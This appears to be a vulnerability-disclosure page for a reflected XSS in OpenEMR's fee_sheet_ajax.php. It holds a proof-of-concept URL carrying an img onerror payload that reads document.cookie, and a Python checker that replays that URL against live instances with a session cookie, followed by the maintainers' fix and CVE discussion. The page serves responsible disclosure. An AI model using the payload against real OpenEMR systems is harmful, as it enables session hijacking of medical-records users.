Cross Site Scripting (reflected) on fee_sheet_ajax.php in openemr/openemr

Valid

Reported on

Aug 18th 2022


Description

When testing the app for XSS, we found that the fee_sheet_ajax.php endpoint is vulnerable to an XSS exploit.

PoC

  1. visit https://<openemr-instance>/interface/forms/fee_sheet/review/fee_sheet_ajax.php?task=retrieve&mode=encounters&prev_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E

OWASP Category

A03:2021-Injection

Remediation

Wrap the reflected value in OpenEMR's text() escaping helper at https://github.com/openemr/openemr/blob/master/interface/forms/fee_sheet/review/fee_sheet_ajax.php#L65 so that it is HTML-encoded before being echoed into the response.

Impact

The impact of an exploited XSS vulnerability varies widely, from session hijacking to disclosure of sensitive data, CSRF and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it may even lead to code execution on the server, depending on the application and the privileges of the account.
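The following script is an added example written for this report, not code from the original submission or from the OpenEMR project. It rebuilds the PoC URL from the parameters above and classifies a response body as unpatched (the payload is reflected verbatim, so a browser would run the onerror handler), escaped (only an HTML-entity-encoded copy is present, which is what wrapping the value in text() produces), or absent. The live fetch assumes the endpoint requires an authenticated OpenEMR session cookie; the two sample bodies at the bottom are constructed, not captured from a real instance, so the check can be run offline.

```python
"""Verify whether fee_sheet_ajax.php still reflects prev_encounter unescaped.

Added example for this report; not OpenEMR code. Assumptions: the endpoint
needs a logged-in session cookie, and an escaped reflection looks like the
output of htmlspecialchars() (what OpenEMR's text() helper wraps).
"""
import html
import urllib.parse
import urllib.request

ENDPOINT = "/interface/forms/fee_sheet/review/fee_sheet_ajax.php"
# Same payload as the PoC: an <img> whose onerror handler runs JavaScript.
PAYLOAD = "<img src=a onerror=alert(document.cookie)>"


def poc_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Build the PoC URL; the payload is percent-encoded as in the report."""
    query = urllib.parse.urlencode(
        {"task": "retrieve", "mode": "encounters", "prev_encounter": payload},
        quote_via=urllib.parse.quote,  # %20 for spaces, as in the PoC, not '+'
    )
    return base_url.rstrip("/") + ENDPOINT + "?" + query


def classify(body: str, payload: str = PAYLOAD) -> str:
    """Return 'vulnerable', 'escaped' or 'absent' for a response body.

    'vulnerable': the raw payload is present, so the tag would be parsed and
                  the onerror handler executed by the victim's browser.
    'escaped':    only an entity-encoded copy (&lt;img ...&gt;) is present,
                  which renders as text and is what text() produces.
    'absent':     the parameter is not reflected at all.
    """
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=False) in body or html.escape(payload) in body:
        return "escaped"
    return "absent"


def check_live(base_url: str, cookie: str, timeout: float = 10.0) -> str:
    """Fetch the PoC URL with an authenticated session cookie and classify it."""
    req = urllib.request.Request(poc_url(base_url), headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify(resp.read().decode("utf-8", errors="replace"))


# Constructed sample responses (not captured from a real instance): what a
# handler that echoes the raw parameter might return, and the same fragment
# after the value has been passed through text()/htmlspecialchars.
SAMPLE_UNPATCHED = '<option value="0">Encounter ' + PAYLOAD + "</option>"
SAMPLE_PATCHED = (
    '<option value="0">Encounter ' + html.escape(PAYLOAD, quote=False) + "</option>"
)

if __name__ == "__main__":
    print(poc_url("https://openemr.example"))
    print("unpatched sample:", classify(SAMPLE_UNPATCHED))
    print("patched sample:", classify(SAMPLE_PATCHED))
    # For a real instance: check_live("https://<openemr-instance>", "OpenEMR=<session id>")
```

Run it against an instance before and after upgrading to 7.0.0.2: a result of "vulnerable" from check_live reproduces the report, "escaped" confirms the fix is in place. Only an exact, unencoded reflection counts as vulnerable here; a handler that alters the payload in other ways would need the response inspected by hand.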

We are processing your report and will contact the openemr team within 24 hours. a year ago
Kusuman modified the report
a year ago
Kusuman modified the report
a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
stephen waite validated this vulnerability a year ago

Thanks for the report. A preliminary fix has been posted in this PR: https://github.com/openemr/openemr/pull/5695

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, then will be ok to make CVE # and make it public.

Thanks!

Kusuman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kusuman
a year ago

Researcher


Okay, thank you.

We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. a year ago
Brady Miller
a year ago

Maintainer


Updating that fix is in PR for rel-700 branch which will be in next 7.0.0 patch 2 (7.0.0.2): https://github.com/openemr/openemr/pull/5808 (after we bring this PR in, will then mark this item as fixed)

Brady Miller marked this as fixed in 7.0.0.2 with commit d5eb41 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
fee_sheet_ajax.php#L65 has been validated
Brady Miller
a year ago

Maintainer


Plan to "Publish" this about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks.

Brady Miller
a year ago

Maintainer


@admin , I made an error in the version that this will be fixed in. It should be 7.0.0.2 and not 7.0.2.

Ben Harvie
10 months ago

Admin


I have updated the fixed version to 7.0.0.2 as requested :)

Kusuman
10 months ago

Researcher


confirmed, it's no longer vulnerable, @admin can we assign a CVE to this vulnerability?

Brady Miller
10 months ago

Maintainer


hi @kusuman, we will likely be releasing the 7.0.0.2 patch this weekend. After we release the 7.0.0.2 patch, then we will "Publish" this vulnerability, which per my understanding will also then assign it a CVE.

Kusuman
10 months ago

Researcher


Got it, thanks.

Brady Miller published this vulnerability 9 months ago
Kusuman
9 months ago

Researcher


@admin can we assign a CVE to this vulnerability?

Brady Miller
9 months ago

Maintainer


@admin, when I published this, I did ensure the CVE toggle was on, but nothing populated/changed in the gui when I did that.

Pavlos
9 months ago

Admin


Sorry about that, we changed our UX. We'll make sure it gets a CVE
